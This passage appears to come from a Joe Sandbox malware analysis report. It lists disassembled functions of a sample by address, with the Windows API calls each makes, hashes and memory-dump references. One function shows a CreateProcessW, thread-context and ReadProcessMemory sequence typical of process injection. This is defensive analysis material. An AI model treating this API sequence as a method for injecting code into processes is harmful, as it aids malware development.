Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: e79f26896927b01ab1c0db9e5660230a273ee7a8863c55ac0d448dc23a60a913
Instruction ID: 2bcb1e3b5bb36dc67e859af7b3c604b71580c8a3895aef45c712af7fc22358c8
Opcode Fuzzy Hash: e79f26896927b01ab1c0db9e5660230a273ee7a8863c55ac0d448dc23a60a913
Instruction Fuzzy Hash: 82417FB2A045585BCF115B648C517FE7FE6EB05314F58F065F88ABF2C2C7619D4083A1

Function 00E7492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00E74992

Part of subcall function 00E935AC: __lock.LIBCMT ref: 00E935B2
Part of subcall function 00E935AC: DecodePointer.KERNEL32(00000001,?,00E749A7,00EC81BC), ref: 00E935BE
Part of subcall function 00E935AC: EncodePointer.KERNEL32(?,?,00E749A7,00EC81BC), ref: 00E935C9

Part of subcall function 00E74A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E74A73
Part of subcall function 00E74A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E74A88

Part of subcall function 00E73B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E73B7A
Part of subcall function 00E73B4C: IsDebuggerPresent.KERNEL32 ref: 00E73B8C
Part of subcall function 00E73B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F362F8,00F362E0,?,?), ref: 00E73BFD
Part of subcall function 00E73B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00E73C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E749D2

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: ff43c187215e1ed68c8006209ed8ea9e4613be4d68e55336c8846a86869efbac
Instruction ID: f02aeac7d8ecf21c1fed18b0e66ceb95c5ef6a0467a16c082d4b0b9dd440fd36
Opcode Fuzzy Hash: ff43c187215e1ed68c8006209ed8ea9e4613be4d68e55336c8846a86869efbac
Instruction Fuzzy Hash: 3111ACB1918305AFCB00EF29DC0591AFBF8EF89720F00852EF448A32A2DB71D545DB92

Function 00E75DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00E75981,?,?,?,?), ref: 00E75E27
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00E75981,?,?,?,?), ref: 00EAE19C

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c38b998a59ed7a5b581b04038aa9563e4c9009c5e7f86844d17ecd320586ed25
Instruction ID: ef74f206030e8f26a610b467aaab036a576a110497dfd0543ba1d8652550bed0
Opcode Fuzzy Hash: c38b998a59ed7a5b581b04038aa9563e4c9009c5e7f86844d17ecd320586ed25
Instruction Fuzzy Hash: BD014071244608BEF7250E24CC8AF767B9CEB0576CF10C719BAE97A1E0C6F45E598B50

Function 00E90FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E9594C: __FF_MSGBANNER.LIBCMT ref: 00E95963
Part of subcall function 00E9594C: __NMSG_WRITE.LIBCMT ref: 00E9596A
Part of subcall function 00E9594C: RtlAllocateHeap.NTDLL(01760000,00000000,00000001,00000000,?,?,?,00E91013,?), ref: 00E9598F

std::exception::exception.LIBCMT ref: 00E9102C
__CxxThrowException@8.LIBCMT ref: 00E91041

Part of subcall function 00E987DB: RaiseException.KERNEL32(?,?,?,00F2BAF8,00000000,?,?,?,?,00E91046,?,00F2BAF8,?,00000001), ref: 00E98830

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: c92bf2364bade78767d8f6adc1f137cff6add453e628396a212fb7d0f812b1ce
Instruction ID: cfe3a3ba8cf99ccf7c1fb75f31f866d39b1546c43659b8b1f63878d7d34dd948
Opcode Fuzzy Hash: c92bf2364bade78767d8f6adc1f137cff6add453e628396a212fb7d0f812b1ce
Instruction Fuzzy Hash: 77F0283550031EA6CF20BA98ED059EF77EC9F01390F10106AFC04F6192DFB28E80A2E0

Function 00E9582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E9585C
__lock_file.LIBCMT ref: 00E9587D

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: b342a8e1e05a77a1647171376c08fc31bc278b2e0a7b35e8f06c9e281a6adcb7
Instruction ID: 5a989967c922cb889a6a98b5823118104e84c1351651d5fbc07c68156e608a5b
Opcode Fuzzy Hash: b342a8e1e05a77a1647171376c08fc31bc278b2e0a7b35e8f06c9e281a6adcb7
Instruction Fuzzy Hash: F6018472800608EBCF23AF699D0659E7BA1AF41360F145229B8147A1A1DB31CA21DB91

Function 00E955D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E98D68: __getptd_noexit.LIBCMT ref: 00E98D68

__lock_file.LIBCMT ref: 00E9561B

Part of subcall function 00E96E4E: __lock.LIBCMT ref: 00E96E71

__fclose_nolock.LIBCMT ref: 00E95626

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 3dd4633027ad274911521c9632817217baae444f1661060d5b413e92f4d98057
Instruction ID: 32a3e016f4c71802da3bdef7ed6246ef2bd2098efdab606422e7a9984d23c3a5
Opcode Fuzzy Hash: 3dd4633027ad274911521c9632817217baae444f1661060d5b413e92f4d98057
Instruction Fuzzy Hash: 16F02472900B04DADF22BF3588027AE7BE02F01334F55A209E410BB1D2CF7C8A019B41

Function 00E781C1 Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00E7558F,?,?,?,?,?), ref: 00E781DA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00E7558F,?,?,?,?,?), ref: 00E7820D

Part of subcall function 00E778AD: _memmove.LIBCMT ref: 00E778E9

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: 2f2efda31bc3b227c7d379683eb01adefcb174e616a8cd142c5cc7b0473f5706
Instruction ID: 9e8bf836a0c204c130724ff687d32d037776984393c0089459d30f399180cbac
Opcode Fuzzy Hash: 2f2efda31bc3b227c7d379683eb01adefcb174e616a8cd142c5cc7b0473f5706
Instruction Fuzzy Hash: 9301A231241504BFEB246A25ED4AF7B3B9CEF85760F10802AFD09ED191DE219940D671

Function 017112FD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01711B2D
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01711B51
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01711B73

Memory Dump Source

Source File: 00000000.00000002.1658953841.0000000001710000.00000040.00001000.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1710000_7F7R8soxHM.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
Instruction ID: 21de51493f99c25d8aeecd31017c6ac0c5fcab4f12fd9daa389ab5929c1df4b9
Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
Instruction Fuzzy Hash: 2A12ED24E24658C6EB24DF64D8507DEB232FF68300F1091E9910DEB7A4E77A4F81CB5A

Function 00E82123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd0953d7cc5cfb3aea06393cd505b51d4778c52edd74eaaae276dc744af2edb1
Instruction ID: ab8c6b607f23b4a8ffce0924ad6568fea5e8c9b2d04a91aaea1b7cdf9141a8df
Opcode Fuzzy Hash: bd0953d7cc5cfb3aea06393cd505b51d4778c52edd74eaaae276dc744af2edb1
Instruction Fuzzy Hash: 04518F35700604AFCF14EB54C995EAE77E6AF85314F14A0A8FA0EBB392DA34ED01CB55

Function 00E75C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00E75CF6

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: f1c4287dc4003043d0ab1da7f10398cbc2d2cb44ac53708e3c4960a38ee3a463
Instruction ID: 09255e6e3091b57731fb6802bf6c21c0bd0fdc921ec687356990533f7020293a
Opcode Fuzzy Hash: f1c4287dc4003043d0ab1da7f10398cbc2d2cb44ac53708e3c4960a38ee3a463
Instruction Fuzzy Hash: 18314932A00B19ABCB18CF29C484AADF7B5FF48314F15C629E819A3710D7B1B960DB90

Function 00EB00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00EB00E1

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: c7bcacbdbdb28e4723b68ffa3e14167ced49b4217adf4a3463555df6909b5d1d
Instruction ID: c94a98bea3581839dd18531494f0bc0959d7101d56ddbee91436a4b2018593a0
Opcode Fuzzy Hash: c7bcacbdbdb28e4723b68ffa3e14167ced49b4217adf4a3463555df6909b5d1d
Instruction Fuzzy Hash: CA410774508341CFDB24DF14C484B5ABBE0BF85358F1999ACE9996B362D332F885CB52

Function 00E74F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E74D13: FreeLibrary.KERNEL32(00000000,?), ref: 00E74D4D

Part of subcall function 00E9548B: __wfsopen.LIBCMT ref: 00E95496

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00F362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E74F6F

Part of subcall function 00E74CC8: FreeLibrary.KERNEL32(00000000), ref: 00E74D02

Part of subcall function 00E74DD0: _memmove.LIBCMT ref: 00E74E1A

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: e2e94e81146c24141cd9dd8cb588b1acdfb6b76f30b331486fedbd8190748683
Instruction ID: 3d8b6a5663e4efa2aa43bbbfceb26ed6159bccb6ecd60eeb0597d3d03e53e6ef
Opcode Fuzzy Hash: e2e94e81146c24141cd9dd8cb588b1acdfb6b76f30b331486fedbd8190748683
Instruction Fuzzy Hash: 3611C472700209AADB15EF70CC02FAE77E49F45700F14E429F546B61C1DB719A059B90

Function 00EB01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00EB01BB

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 1e630042cbdb9914b8d71d2b15c16dc15b9bc031f773ad2596e2ebb74916acc8
Instruction ID: 1e4622fdc37779810e8018108ac5d70c19726d531e84fdf7ff353099ba494efc
Opcode Fuzzy Hash: 1e630042cbdb9914b8d71d2b15c16dc15b9bc031f773ad2596e2ebb74916acc8
Instruction Fuzzy Hash: 2F2113B4508341CFCB24DF64C444A5BBBE0BF84348F09996CE99A67762D732F849CB52

Function 00E75D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00E75807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00E75D76

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6d6e646af9b9b77e3593da603413cca17000d2cd4998650e4065e0a2d5af79a4
Instruction ID: a21530613c88f9a514b54924e333da7476d72007981621df44b0a4e3c64c01cb
Opcode Fuzzy Hash: 6d6e646af9b9b77e3593da603413cca17000d2cd4998650e4065e0a2d5af79a4
Instruction Fuzzy Hash: 5A112532200B059FD3308F55C888B63B7E9EF45764F10C92EE6AA96A50D7B0E945CB60

Function 00E94A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00E94AD6

Part of subcall function 00E98D68: __getptd_noexit.LIBCMT ref: 00E98D68

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 9fba02d1b84cc368069aea92dfa1dda3df4449131385717917c189043a30db28
Instruction ID: e78037e4e789ea2182143cb7fa5c084431ebd2adcab8ccf1bcb0038b078886f0
Opcode Fuzzy Hash: 9fba02d1b84cc368069aea92dfa1dda3df4449131385717917c189043a30db28
Instruction Fuzzy Hash: 1DF0A4B19402099BDF61AF748C06BDE37E1AF0132AF086514B814BA1E1EBB88A52DF51

Function 00E74FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00F362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E74FDE

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: b294d6862ad0c0b2e5808129d0695e1a2eb6432878c8a89fb199236dbcb90810
Instruction ID: 7b3db36e41aaeab9d4ea69a3579f2f691ab680a8c0df2f343b44eca3c42431de
Opcode Fuzzy Hash: b294d6862ad0c0b2e5808129d0695e1a2eb6432878c8a89fb199236dbcb90810
Instruction Fuzzy Hash: 66F039B1205712CFCB389F64E494862BBE1BF04329321EA3EE1DAA2651C731A844DF40

Function 00E909D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E909F4

Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 43553b4b060b2ba0e5cd99e9bd72fc94645f55e339ec4d888cb8bdc756d02bfc
Instruction ID: ae2c85085dc7bba4fca82fecc295e7b67ddcecceb8d6c9092b2a81cd7ccddea3
Opcode Fuzzy Hash: 43553b4b060b2ba0e5cd99e9bd72fc94645f55e339ec4d888cb8bdc756d02bfc
Instruction Fuzzy Hash: A8E086369042285BD720D6989C05FFA77EDDFC9690F0541B5FD4CE7214D960AC818690

Function 00ED9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00ED914B

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction ID: 0ac1b1bcc76d01ab2ba5355add70e9adab1e813c3519ccfe3e99af4777312635
Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction Fuzzy Hash: 81E092B1204B405FDB398A24DC107E373E0EB06319F00081DF29A93342EB6278428759

Function 00E75DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00EAE16B,?,?,00000000), ref: 00E75DBF

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 6f166641d2e1311546a56d9dc16c2c1400a59593c15a7347f752ab0a8117a440
Instruction ID: 77e83cb11b245ce01c6f46c0f5ae35bbaaadbd5e1c0e2734ee403b3d09983ee0
Opcode Fuzzy Hash: 6f166641d2e1311546a56d9dc16c2c1400a59593c15a7347f752ab0a8117a440
Instruction Fuzzy Hash: FBD0C77464020CBFE710DB81DC46FAD777CDB45710F100294FD0466390D6B27D548795

Function 00E9548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00E95496

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
